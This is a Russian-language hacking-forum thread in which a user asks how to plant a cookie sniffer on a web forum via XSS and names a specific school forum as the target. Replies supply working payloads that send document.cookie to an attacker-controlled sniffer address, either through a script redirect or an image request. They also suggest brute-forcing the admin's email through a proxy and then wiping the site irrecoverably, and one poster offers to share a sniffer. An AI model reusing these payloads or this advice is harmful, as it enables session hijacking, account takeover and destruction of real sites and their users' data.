на античате.ру есть возможность создать сниффер....у меня вопрос: када я его создаю в графе картинка что нада писать? и как потом заливать сниффер на скажем форум что бы он корректно работал и выдовал мне пакеты пользователей прочитавших страницу с этим сниффером или непосредственно перешедшим на этот сниффер если на него нада переходить?? :confused:
с уважением, психанутый доктор.

З.Ы. вникал где-то часа 2 так и не понял что туда нада сунуть, по идее урл на картинку, но почему-то не сработало.....разъясните пожалуйста, желательно на пальцах чтоб дошло точно и с первого раза, не смотря на то что я довольно опытен в работе со сниферами (на сайте просто он халявный и судя по всему оч хороший должен быть) да и со взломом вообще, хочу просто этот метод опроьовать.....буду бесконечно признателен за помощь ;)


еще раз с уважением

Чтобы сниффер работал, его нужно засовывать в XSS, а про то, что такое XSS, можно прочитать на _http://www.google.com

я читал принцип работы сниффера......там нет решения моей проблемы....щас я хочу понять что нужно писать в графе "Картинка" на сайте античатюру в разделе сниффер.....что такое хсс я знаю.....мне нужно знать как залить сниффер в данном случае через античат

"Залить" жаваскриптовой командой <script>document.location="снифер"+document.cookie</script>

а на ачате щас вроде нельзя зарегать снифер

Залить снифер? Хм... =)
Снифер он только перехватывает данные, ты его никуда не заливаешь. Но чтобы он перехватывал данные, его нужно уметь внедрить.
Короче находишь CSS и вместо слова alert() пишешь img = new Image(); img.src = "АДРЕС_ТВОЕГО_СНИФЕРА?"+document.cookie; вот и все.
ЗЫ если срочняк нужен снифер, а он не регится, пиши в ПМ, поделюсь своим, ибо его какой-то дебил заюзал... Короче можно сказать, убили мой снифер =)

Fr-Ron, уязвимость называеца XSS :)
Автор читай мой первый ответ...БЛ***!!

блин....а где найти css на school1304.2bb.ru (движок как и на mybb)

хорошо...а как его залить в XSS? на том же форуме? я являюсь тока пользователем и не могу скрипты менять, а соответсвено я могу тока втыкать картинки и ссылки типа нажи "сюда" и перейдет на сайт командами блаблабла где блаблабла есть урл картинки и [url=блаблабла[/url] где блаблабла собственно адрес сайта? как тада заливать?

2 Fr-Ron:
можешь мне сказать ссылку на этот "убитый" сниффер на icq: 271106568 плз?

Fr-Ron, уязвимость называеца XSS

Да ну? Cross Site Scripting это зовется, но чтоб не путать с таблицей стилей, ее обзывают иногда XSS, но оригинальное название - CSS.


crazydoctor
Ууу... Перед mybb потренировался бы получше =) Там баги на лету латают...

Добавил : зачастую проще пробрутить мыльник админский и выслать на него пасс... Только вот забыл я уже где этот мыльник искать, ща попробую найти... Если найду, отпишусь...

...

Еще раз добавил... Че-то не вижу я больше этой фичи... Когда-то на 3бб когда баги искал, было ясно написано "e-mail администратора бла-бла-бла". В конце концов можно у админа и спросить. Но тогда нужно бы не спалиться... Ну там, зарегься через проксю, получи мэйл, вскрой, а потом снеси там все без возможности восстановления =))

Доктор, если нужен снифер, стучи в ПМ, токо кидай такую заяву

- логин
- пасс (если нада)
- имя картинки с последующим редиректом на существующую картинку
- картинка, на которую пойдет редирект
- имя картинки без редиректа.

Да ну? Cross Site Scripting это зовется, но чтоб не путать с таблицей стилей, ее обзывают иногда XSS, но оригинальное название - CSS.
Вранье! Оригинальное название XSS. CSS- Cascading Style Sheets и все тут. Cross Site Scripting- всегда XSS



Добавил : зачастую проще пробрутить мыльник админский и выслать на него пасс...

Бруть, особенно если у админа пароль Mysuperpupergirl1

Эм... Предъявы? =) Я же со своего опыта писал... Не знаю как тебе, но лично мне проще сначала ящик побрутить, чем искать багу в mybb. И я ведь не сказал, что всегда так ;)

Cross Site Scripting- всегда XSS
по буквам получается CSS и что бы не путать пишут XSS